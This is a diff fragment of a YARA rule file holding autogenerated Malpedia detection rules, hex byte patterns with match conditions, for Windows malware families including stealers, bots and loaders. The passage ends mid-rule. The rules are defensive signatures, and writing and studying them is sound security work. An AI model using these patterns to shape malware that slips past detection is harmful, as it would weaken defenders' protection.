"https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.beepservice_auto.yar#L1-L282" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_088" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_088_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "1b28ba46a772486fbc8465a9c3e2af5f383317dc6efaca43bb04db774c11995d" + logic_hash = "edb29cf74a1f7930c182d8621bb40052ec38cc60668c8de3f80bbb2fb8759321" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -181584,51 +184310,32 @@ rule MALPEDIA_Win_Beepservice_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd6 8bc8 ff15???????? 50 } - $sequence_1 = { 8b0d???????? 68???????? ffd6 8bc8 } - $sequence_2 = { e8???????? 83f801 7505 e8???????? 68???????? 68???????? } - $sequence_3 = { 7512 6888130000 68???????? e8???????? 83c408 } - $sequence_4 = { 83c408 e9???????? 68???????? e8???????? 83c404 6a00 } - $sequence_5 = { 683f000f00 6a00 68???????? ff15???????? } - $sequence_6 = { ff7604 68???????? e8???????? ff7608 e8???????? 83c40c } - $sequence_7 = { 83ffff 750e ff15???????? 50 68???????? eb43 } - $sequence_8 = { 68???????? 57 ff15???????? 85c0 741c 3975fc } - $sequence_9 = { ff7604 e8???????? 83f814 59 } - $sequence_10 = { e8???????? 83f820 59 730f ff7618 68???????? e8???????? } - $sequence_11 = { e8???????? ff7610 e8???????? 50 ff7610 53 e8???????? } - $sequence_12 = { 83c410 8d4c2408 6a00 6a00 } - $sequence_13 = { bf???????? a3???????? 83c404 a3???????? a3???????? 66a3???????? f3ab } - $sequence_14 = { 85c0 742b 817c240400240000 7521 56 } - $sequence_15 = { ffd7 8d442414 50 56 } - $sequence_16 = { 8bca 83e103 f3a4 8b7314 83c9ff 8bfe } - $sequence_17 = { e8???????? 83c404 50 8b4d0c 8b5114 } - $sequence_18 = { e8???????? 83c408 33c0 e9???????? c785f8fdffff00240000 6a00 8d95f4fdffff } - $sequence_19 = { 8b0d???????? ff15???????? 8bc8 ff15???????? 8b15???????? 52 } - $sequence_20 = { 8b511c 52 e8???????? 83c404 83f820 } - $sequence_21 = { 6a01 6a00 6a00 6a05 e8???????? 83c414 } - $sequence_22 = { e8???????? 6a00 6a00 b907000000 6a00 } - $sequence_23 = { c3 68e8030000 6a02 6a00 6a00 6a02 } - $sequence_24 = { 6a04 e8???????? 83c414 85c0 7510 ff15???????? } - $sequence_25 = { 50 53 c744241428010000 e8???????? } - $sequence_26 = { bf???????? 83c9ff 33d2 b301 f2ae f7d1 49 } - $sequence_27 = { b90a000000 be???????? bf???????? 33c0 f3a5 bf???????? 83c9ff } - $sequence_28 = { 52 89442424 ff15???????? 8bf0 85f6 7505 } + $sequence_0 = { c642e801 894af4 83f807 75df c705????????06000000 c705????????11000000 c705????????12000000 } + $sequence_1 = { c705????????208d4200 c705????????62eb4100 c705????????90154200 c605????????01 c705????????10000000 c705????????20a94200 c705????????40eb4100 } + $sequence_2 = { c605????????01 c705????????04000000 c705????????80a94200 c705????????61e04100 c705????????30054200 c705????????00000000 } + $sequence_3 = { 8b10 8d4a01 8d3490 8908 8b4de4 8b5e08 } + $sequence_4 = { 0f8438010000 8b00 39c7 720d 48 893c24 } + $sequence_5 = { 8b7de4 e9???????? 8d65f4 5b 5e 5f 5d } + $sequence_6 = { e9???????? c705????????08000000 c705????????04000000 c605????????12 c705????????00000000 c705????????d80f4200 } + $sequence_7 = { c705????????a0ad4200 c705????????4ce84100 c705????????100d4200 c605????????01 c705????????04000000 } + $sequence_8 = { e8???????? 89d9 89c2 e8???????? 8d65f4 5b } + $sequence_9 = { 894c2408 89f1 89542404 895c240c e8???????? b904000000 83ec10 } condition: - 7 of them and filesize <253952 + 7 of them and filesize <919552 } -rule MALPEDIA_Win_Backspace_Auto : FILE +rule MALPEDIA_Win_Unidentified_111_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8637042a-e46d-5e46-8b23-93a8dfec3a24" + id = "761c3c1a-627b-5adf-b1c2-f96f11c05a94" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.backspace_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_111_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "f8be0bb8ce4eb3c98209ea23733b4688fab87fe72dcb307bd40859035b4f4c31" + logic_hash = "8a86a6eb9509e0a5b4e912cde53abfcabb23f3644fc565d69ca8396c5dc5d7c9" score = 75 quality = 75 tags = "FILE" @@ -181642,32 +184349,32 @@ rule MALPEDIA_Win_Backspace_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 40 50 ff15???????? 85c0 0f8fa3000000 } - $sequence_1 = { 3bfb 59 7405 83c705 } - $sequence_2 = { 8d8500feffff 50 e8???????? 83c424 85c0 740b ff750c } - $sequence_3 = { 8b45f8 ff45f8 3d88130000 7f51 ebc9 8a06 } - $sequence_4 = { 885d91 885d92 885d93 885d94 } - $sequence_5 = { ff15???????? f7d8 1bc0 59 83e002 59 48 } - $sequence_6 = { 393d???????? 7552 be00200000 ff75f8 8d85f8dfffff } - $sequence_7 = { 50 e8???????? 56 e8???????? 8bd8 be???????? 83c306 } - $sequence_8 = { 8d85f8dfffff 50 e8???????? 59 8bc3 59 e9???????? } - $sequence_9 = { a3???????? ff75fc ffd6 395dfc } + $sequence_0 = { 488b4c2428 0fbe09 3bc1 7512 } + $sequence_1 = { c744242002000000 e9???????? 837c243406 7511 837c243801 750a } + $sequence_2 = { 8b00 488b4c2430 488b09 0fbe0401 48634c2404 488b542428 0fbe0c0a } + $sequence_3 = { eb43 41b901000000 448b442424 488b542428 488b4c2448 e8???????? } + $sequence_4 = { eb1f c744242000000000 4533c9 4533c0 } + $sequence_5 = { 488b4c2448 ff15???????? 89442444 837c244400 7502 eb11 } + $sequence_6 = { 488d8c0c60020000 ba02000000 486bd200 4803ca 448bc0 488b542420 e8???????? } + $sequence_7 = { 66c1ca08 0fb7d2 4c8b8424a0000000 450fb74006 6641c1c808 450fb7c0 4c8b8c24a0000000 } + $sequence_8 = { e8???????? b910000000 e8???????? 4889442448 488b442448 488b4c2450 488908 } + $sequence_9 = { 4889542410 48894c2408 4883ec78 c744243000000000 c744243400000000 488b942488000000 488d4c2448 } condition: - 7 of them and filesize <131072 + 7 of them and filesize <148480 } -rule MALPEDIA_Win_Credraptor_Auto : FILE +rule MALPEDIA_Win_Latentbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "744ed2ca-2dde-53b2-b19d-4369cb84cbb1" + id = "02ad78f6-9191-5ecc-84c6-a6e6dbb03fa8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.credraptor_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.latentbot_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "751cbf31cf2ad7ebff2dead521605a0ec12dc4ff6ec97fefa5bfc3c13ba5bce0" + logic_hash = "efd4cdc341dd3e728319b10f2fc1071c2f12b6836d6f2ac31876c93b1c888c11" score = 75 quality = 75 tags = "FILE" @@ -181681,32 +184388,32 @@ rule MALPEDIA_Win_Credraptor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { bb???????? 8bf8 e8???????? 8945fc 8b45f8 83c408 85c0 } - $sequence_1 = { c6402597 895028 8b5120 89502c 8bce 8bc3 e8???????? } - $sequence_2 = { 8d4db4 e8???????? 85c0 754b 8d55b4 52 e8???????? } - $sequence_3 = { b800020000 660bc8 8b45f8 5f 894604 894624 66894e1c } - $sequence_4 = { a900050000 7565 837b1c00 745f 8b4df8 8b5110 52 } - $sequence_5 = { 8b8e14020000 8975f0 895df8 e8???????? 8bf8 83c404 897dfc } - $sequence_6 = { 8db5c8fdffff e8???????? 85c0 7430 8b8dccfdffff 8b7f0c 8b95c8fdffff } - $sequence_7 = { 894d94 8bff 8a01 dd8574ffffff dd05???????? 3c25 7409 } - $sequence_8 = { c7461000000000 53 c60600 e8???????? 83c404 807f4100 8bdf } - $sequence_9 = { bb07000000 85ff 7439 ba60240000 6685571c 7409 57 } + $sequence_0 = { 48 89742430 4c 892424 4c 8b6118 44 } + $sequence_1 = { 833a00 7410 49 8b0a } + $sequence_2 = { 90 0fb7c0 8d68bf 6683fd19 7703 83c020 0fb7c0 } + $sequence_3 = { c16d5008 836d5808 888c3020290000 eb12 8b4554 8a00 8b4d4c } + $sequence_4 = { 59 6a46 eb05 6a30 59 6a39 58 } + $sequence_5 = { 33c9 03f0 13ca 33c0 0375f8 } + $sequence_6 = { 56 0fb730 6683fe41 720c 6683fe5a 7706 83c620 } + $sequence_7 = { 837d4c00 8b5d68 0f8408030000 c70624000000 e9???????? } + $sequence_8 = { 33c9 51 890e 8bdc 52 6a40 } + $sequence_9 = { 8d45cf 897e04 8bd1 2bc1 881c10 4a 75fa } condition: - 7 of them and filesize <1728512 + 7 of them and filesize <401408 } -rule MALPEDIA_Win_Diavol_Auto : FILE +rule MALPEDIA_Win_Wpbrutebot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fdab7e4d-8bbf-526f-9dd1-9c3eccb8a369" + id = "ee6ef210-d105-53c3-a558-0e67b4040536" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.diavol_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wpbrutebot_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "8bc41d08eecdbb842d56f4530baf282b624ea1b70952493cedafeb9a5a3b5234" + logic_hash = "709c38b5efc64910ec1c02f61c4cfca810d098711a98c2359e209f406eb3230c" score = 75 quality = 75 tags = "FILE" @@ -181720,32 +184427,32 @@ rule MALPEDIA_Win_Diavol_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8bf0 83feff 0f8474010000 } - $sequence_1 = { 8d8df8fdffff 51 b9???????? e8???????? 83c404 84c0 } - $sequence_2 = { 74cf 8bc7 ebce 66833800 7520 } - $sequence_3 = { e8???????? 8b4df8 83c40c 5f 5e 33cd b001 } - $sequence_4 = { 83fb01 7503 894df8 8b4d10 8bc3 } - $sequence_5 = { 752c 6a02 53 ff15???????? } - $sequence_6 = { e8???????? 83c40c 8b4dfc 5f 5e 33cd b001 } - $sequence_7 = { 6a10 46 8d843594f7ffff 68???????? 50 e8???????? } - $sequence_8 = { 8d45e4 50 8bc8 51 57 8bd0 } - $sequence_9 = { 0f84ee000000 53 57 33db 8d9b00000000 } + $sequence_0 = { 894f54 897758 89775c e9???????? 85c9 7515 c7475003000000 } + $sequence_1 = { f7472c00010000 b35d 7411 8b4730 6a5d 8b4804 8b01 } + $sequence_2 = { f6044dc81e5e0002 7410 8bc1 ba01000000 83f020 85d2 0f44c1 } + $sequence_3 = { c645fc04 8d8dfcf4ffff e8???????? 68???????? 8bd0 c645fc05 8d8d14f5ffff } + $sequence_4 = { ff742420 8b7a08 037c2420 89442448 c744244c01000000 897c2450 8b4a08 } + $sequence_5 = { c781f0050000bfe45900 5b 83c408 c3 5f 5e 5d } + $sequence_6 = { 7228 8bb504ffffff 8d8504ffffff 50 8bc8 e8???????? 8b8518ffffff } + $sequence_7 = { 8b44245c a802 b800000000 0f45d8 895c241c 85f6 7410 } + $sequence_8 = { f7e9 d1fa 8bc2 c1e81f 03c2 83f801 762b } + $sequence_9 = { ffb7ec0c0000 6a01 53 e8???????? 8be8 83c410 } condition: - 7 of them and filesize <191488 + 7 of them and filesize <5134336 } -rule MALPEDIA_Win_Ufrstealer_Auto : FILE +rule MALPEDIA_Win_Vohuk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "87df7a80-59b4-5e49-9e5c-787423bd5a1a" + id = "411a3e2f-1751-5273-acfa-62305bd7fa2f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ufrstealer_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vohuk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vohuk_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "bbd8353728980ed7d41eeaaf6b45527dc201d1c8bc1c51c590cb1fee36b76ae8" + logic_hash = "2ed67cd931d1a068f4ca262bb4544ee71becc9ba564d979b0f2e30b12b56f8a3" score = 75 quality = 75 tags = "FILE" @@ -181759,32 +184466,32 @@ rule MALPEDIA_Win_Ufrstealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a01 6a00 6a00 68???????? 6a00 68???????? ff15???????? } - $sequence_1 = { 0bc0 7529 8b43fc 03d8 8b03 83c304 83f8ff } - $sequence_2 = { ffb5ecf3ffff ff15???????? 5b 5f 5e c9 } - $sequence_3 = { 894df4 8b75f4 83ee01 c745f008000000 0fb64eff 0fb616 83f97f } - $sequence_4 = { 03c1 80383a 7505 c60000 eb03 49 } - $sequence_5 = { ff35???????? ff15???????? 85c0 0f842debffff a3???????? 68???????? ff15???????? } - $sequence_6 = { 0f85c0000000 0fb60d???????? a1???????? 8808 8305????????01 894dfc bb???????? } - $sequence_7 = { 8d45dc 6a04 50 e8???????? 8305????????04 e8???????? } - $sequence_8 = { 50 68???????? 68???????? 6a00 ff15???????? 68???????? ff15???????? } - $sequence_9 = { c745d80e000000 33c0 8b75d8 8bc8 8db65c884200 } + $sequence_0 = { ff35???????? 8d45ba 50 e8???????? 83c408 e9???????? c745b48f00a000 } + $sequence_1 = { e8???????? c7451850000000 837d1800 7e20 33c9 8a840df4f9ffff 8d4901 } + $sequence_2 = { 50 ff15???????? a3???????? 33f6 b818000000 c745b245007d00 c745b666006300 } + $sequence_3 = { a3???????? c745b6b700b400 c745bab100fb00 c745be82009e00 c745c2f800f400 c745c6e400fb00 c745caf900b100 } + $sequence_4 = { 8b0d???????? bac1655634 8b75f8 6892000000 e8???????? 8d4d94 51 } + $sequence_5 = { 33c9 8d4900 8a840d48e6ffff 8d4901 88840d57ffffff 8b45fc 48 } + $sequence_6 = { 85c0 7413 8b4b14 c6431c00 e8???????? 5f 5e } + $sequence_7 = { 88840d57ffffff 8b45fc 48 8945fc 837dfc00 7fe2 8d85d8fcffff } + $sequence_8 = { 8d45f2 803d????????01 8945dc 8d45ea 7403 } + $sequence_9 = { c5fe6f4580 c4e37d4645a031 c5fe7f8080000000 c5fe6f85e0feffff c4e37d468500ffffff31 c5fe7f80a0000000 } condition: - 7 of them and filesize <770048 + 7 of them and filesize <260096 } -rule MALPEDIA_Win_Unidentified_042_Auto : FILE +rule MALPEDIA_Win_5T_Downloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9e093b61-c910-5742-8226-775531f91d9d" + id = "fe4393a3-e3cd-5e60-a348-fa50df874e7a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_042_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.5t_downloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.5t_downloader_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "7aca5d090ae8281044c7e148c75c276642daf90859ffb2907ade4921d2dec5c9" + logic_hash = "708a5991b6f83db848239b1110cc9bc587325f0c0450305b55a83b6de5bbd18e" score = 75 quality = 75 tags = "FILE" @@ -181798,32 +184505,32 @@ rule MALPEDIA_Win_Unidentified_042_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 754f 6a02 53 56 8d8d9cfeffff 57 } - $sequence_1 = { 56 8d8d68e1ffff 51 8d9554f7ffff 52 89b550f7ffff } - $sequence_2 = { 5b 85c0 78dd 8b45fc 8b55f8 0fb64c3801 4a } - $sequence_3 = { 8b4db8 895640 8b9518fdffff 895620 8b9520fdffff 894e44 8b8d1cfdffff } - $sequence_4 = { 8d8580cbffff 50 6a00 ff15???????? 85c0 7527 8b1d???????? } - $sequence_5 = { 5e 8bc7 5f 5d c3 8b7514 85f6 } - $sequence_6 = { 8bc3 2bc2 8d0c91 2bf0 42 8d3c87 3bf2 } - $sequence_7 = { 85db 0f85af000000 8d45ac 8bf0 8d5d9c 50 } - $sequence_8 = { 8d4df8 51 8d5df4 e8???????? 83c408 85c0 780d } - $sequence_9 = { 52 50 8d4b70 e8???????? 83c408 85c0 0f850b020000 } + $sequence_0 = { 7409 83781800 7403 5d } + $sequence_1 = { 85c9 7409 83781800 7403 5d } + $sequence_2 = { 85c9 7409 83781800 7403 } + $sequence_3 = { 85c0 7416 83781400 7510 } + $sequence_4 = { 85c9 7409 83781800 7403 5d ffe1 83c8ff } + $sequence_5 = { 8b4508 85c0 7416 83781400 7510 } + $sequence_6 = { 55 8bec 8b4508 85c0 7416 83781400 7510 } + $sequence_7 = { 85c9 7409 83781800 7403 5d ffe1 } + $sequence_8 = { 7409 83781800 7403 5d ffe1 83c8ff } + $sequence_9 = { 8bec 8b4508 85c0 7416 83781400 7510 } condition: - 7 of them and filesize <516096 + 7 of them and filesize <539648 } -rule MALPEDIA_Win_Sagerunex_Auto : FILE +rule MALPEDIA_Win_Entryshell_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f1b502b3-b120-59e0-983f-cafb93914bcc" + id = "602f60d0-cc33-528b-8fdb-8d928745f559" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sagerunex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sagerunex_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.entryshell" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.entryshell_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "08cdcbbbd6ca868eddb1becc5a51582d041936061352010bb8c3c5ac48e633a5" + logic_hash = "870b124d6520583c6a18845739a5248302a0431048dbb7822501065378b2f353" score = 75 quality = 75 tags = "FILE" @@ -181837,32 +184544,32 @@ rule MALPEDIA_Win_Sagerunex_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c8bb424d8010000 c744245001000000 4c896c2458 4c896c2460 4885c9 742c 4a8d04fd00000000 } - $sequence_1 = { 72d1 498bd4 483bd7 488d4de7 480f42fa 488bd7 e8???????? } - $sequence_2 = { c74324a44ffabe 488bcb 89b3e8000000 c70340000000 e8???????? 488d442420 c60000 } - $sequence_3 = { 498bcc e8???????? 85c0 7849 488d45b0 488d55f0 498bcf } - $sequence_4 = { e8???????? e8???????? ffc7 448bc0 b84fecc44e 41f7e8 c1fa03 } - $sequence_5 = { 4d894838 4c8b5340 458bca 4983d300 49c1ea20 418bc9 4d0fafcf } - $sequence_6 = { 894260 33d2 e8???????? 488d442470 488d15d0230300 } - $sequence_7 = { 83f803 7cc5 eb04 897c2450 443bfe 752a 448b7c2444 } - $sequence_8 = { 498bcf c745df02000000 c745fb01000000 c745e301000000 ff15???????? 85c0 7507 } - $sequence_9 = { 4403c0 418bc6 4503c2 c1c007 c1ca0b 33d0 418bc6 } + $sequence_0 = { 85db 7517 53 8d95e4dfffff 8b8d8cddffff } + $sequence_1 = { 771d 8d8290c72501 8d5001 660f1f440000 } + $sequence_2 = { 83c40c 8d8424a8080000 50 6804010000 ff15???????? 8d442450 50 } + $sequence_3 = { 8b46f8 0fb684054fffffff 8842fd 83ef01 75a1 0f1003 53 } + $sequence_4 = { 83c404 84c0 0f8495010000 8bbdf4efffff 85ff 0f84eefcffff 6a20 } + $sequence_5 = { e8???????? 59 83cfff 897de4 33c9 894dfc 8b049d78512501 } + $sequence_6 = { 8945f8 53 8b5d08 0f57c0 56 57 895de8 } + $sequence_7 = { 83c40c 8d4ffe 668b4102 8d4902 6685c0 75f4 e9???????? } + $sequence_8 = { 8a0445399f2401 eb02 32c0 0fb64d0c 0fb6c0 6bc009 03c1 } + $sequence_9 = { 02d2 029013800000 02d2 029014800000 02d2 029015800000 02d2 } condition: - 7 of them and filesize <619520 + 7 of them and filesize <663552 } -rule MALPEDIA_Win_Killav_Auto : FILE +rule MALPEDIA_Win_Pipemon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1d5124ec-5245-51ca-8b54-4fbeb7c8a843" + id = "fb1257dc-1899-57a8-9bb3-37873100ec17" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killav" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.killav_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pipemon_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "6bdcae63c9d790007a185fb309199c790674ed97c7a86b96314a377ad757753a" + logic_hash = "a7cf49399560b8b73200f34644a487f3922c8589009d7d641339ef3a3238ec7b" score = 75 quality = 75 tags = "FILE" @@ -181876,32 +184583,32 @@ rule MALPEDIA_Win_Killav_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c745e4e8e24200 e9???????? 894de0 c745e4e8e24200 e9???????? } - $sequence_1 = { 8955e0 8b048d70ba4300 f644102801 747c } - $sequence_2 = { 6a20 c745e000000000 e8???????? 8bf0 83c404 8975e0 } - $sequence_3 = { 8b45f8 8b55f0 8b048570ba4300 807c022800 } - $sequence_4 = { e8???????? 8b35???????? 6a00 6880000000 6a03 6a00 6a00 } - $sequence_5 = { c645fc1c 50 8d4dd0 e8???????? c645fc00 8b55ec 83fa08 } - $sequence_6 = { 8b049570ba4300 885c012e 8b049570ba4300 804c012d04 } - $sequence_7 = { 8d45d8 c645fc37 50 8d4dd0 } - $sequence_8 = { 6bf838 894df8 8b048d70ba4300 33c9 } - $sequence_9 = { e8???????? 8d45d8 c645fc08 50 8d4dd0 } + $sequence_0 = { 418bf8 4903fe 85db 0f84a1000000 6690 49634e3c } + $sequence_1 = { 7516 488d05bd360100 488b4c2430 483bc8 7405 e8???????? 488b05???????? } + $sequence_2 = { 85c0 7427 488b4c2438 488d1526d90000 ff15???????? } + $sequence_3 = { b906000000 48898620020000 0fb7c0 66f3ab 488d3d2c3b0100 } + $sequence_4 = { 488d4c2438 e8???????? 4c8d4820 4889442420 4c8bc3 488d5590 488d4c2438 } + $sequence_5 = { 4881c458010000 c3 83f801 7529 b803000000 488b8c2440010000 4833cc } + $sequence_6 = { 458d4d02 458bc7 488d542450 488bc8 } + $sequence_7 = { e8???????? 4881c498000000 c3 448b442430 488d1543fe0100 33c0 488d4c2440 } + $sequence_8 = { ffc8 3d03010000 7734 488d44244c 488bd7 } + $sequence_9 = { 80bd8008000000 0f84b6010000 4d85ed 0f84b6000000 } condition: - 7 of them and filesize <517120 + 7 of them and filesize <389120 } -rule MALPEDIA_Win_Ghost_Secret_Auto : FILE +rule MALPEDIA_Win_Thanatos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1b3488d9-dad5-57ab-8ddb-ae7fa19ffb25" + id = "3d56c6ff-7a5f-5548-8f3b-06d8d6158f7b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_secret" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ghost_secret_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.thanatos_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "36f12490c5a1c42890949e26bd5a0482d94d3f78b5528e6a3d7d1ab5deca281b" + logic_hash = "2cc3d4fef37b3d57358c4e21f8e34a4b374cac5e972e715588051a429530df72" score = 75 quality = 75 tags = "FILE" @@ -181915,34 +184622,34 @@ rule MALPEDIA_Win_Ghost_Secret_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d852cf1ffff 50 e8???????? 8d8548fbffff 50 e8???????? 59 } - $sequence_1 = { c68424af050000fd c68424b0050000f6 c68424b105000093 c68424b205000038 c68424b305000032 c68424b405000048 c68424b5050000e5 } - $sequence_2 = { c68424b902000066 c68424ba02000072 c68424bb0200001a c68424bc0200004a } - $sequence_3 = { c68424e903000052 c68424ea03000082 c68424eb03000058 c68424ec0300008e } - $sequence_4 = { c684243e030000f0 c684243f030000f2 c68424400300003b c6842441030000c7 c6842454050000ab c684245505000087 c6842456050000d6 } - $sequence_5 = { 85c0 740b 33c0 5f 5e 5b 8be5 } - $sequence_6 = { ff15???????? e9???????? a1???????? 33db 3bc7 7e0e 50 } - $sequence_7 = { c684247c05000006 c684247d0500003e c684247e05000012 c684247f05000053 c684248005000092 c684248105000042 c6842482050000e8 } - $sequence_8 = { c644247460 c64424751f c6442476e7 c64424778a c6442478dd c68424f40000006a 888c24f5000000 } - $sequence_9 = { 83c408 5f 5e 81c400200000 c3 81ecfc000000 } + $sequence_0 = { 85f6 0f849b010000 ff742428 6a00 68ffff1f00 ff15???????? 8bf8 } + $sequence_1 = { 50 8bda 8bf1 c78560ffffff94000000 e8???????? 83c40c 8d8560ffffff } + $sequence_2 = { c64435bc46 8d45bc 50 46 ffd7 3bf0 7ce9 } + $sequence_3 = { 6a00 6a00 68000000c0 68???????? 46 ffd3 8bf8 } + $sequence_4 = { 83c40c 807d0800 7459 8b4c240c 897c2422 8d4306 8944241e } + $sequence_5 = { 807d0800 89442414 b80a000000 7524 3bdf } + $sequence_6 = { 84c0 75f9 2bd7 5f 7409 51 ff15???????? } + $sequence_7 = { 57 8bf9 8b4e28 8955fc 83f803 0f85e5020000 8b5d08 } + $sequence_8 = { 893d???????? c705????????ecb40110 f30f7e05???????? 660fd64008 } + $sequence_9 = { 50 6a02 ff15???????? 8b7514 c705????????c0b30110 85f6 0f8486010000 } condition: - 7 of them and filesize <278528 + 7 of them and filesize <1810432 } -rule MALPEDIA_Win_Reactorbot_Auto : FILE +rule MALPEDIA_Win_Aresloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "db667bb6-5a2a-5433-bb3f-44b94a1b8ccd" + id = "aecf8195-bc3f-5d42-bd81-bfa1c242c64d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.reactorbot_auto.yar#L1-L159" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aresloader_auto.yar#L1-L109" license_url = "N/A" - logic_hash = "a8dd74cde779dbd1edde8ec6ea240ea579363dd37eac297b9622688e884b36e8" - score = 75 - quality = 75 + logic_hash = "3fed3bf2cf5088e9a8f4396999f890e21fa81afee0e4b5adddfaf27ad4b3888c" + score = 60 + quality = 25 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -181954,38 +184661,32 @@ rule MALPEDIA_Win_Reactorbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ff15???????? 8d8d90fdffff 51 8d9580f9ffff } - $sequence_1 = { c745f400000000 c745e800000000 c745e400000000 a1???????? 8945e0 } - $sequence_2 = { 7418 6aff a1???????? 50 ff15???????? } - $sequence_3 = { 837dfcff 7411 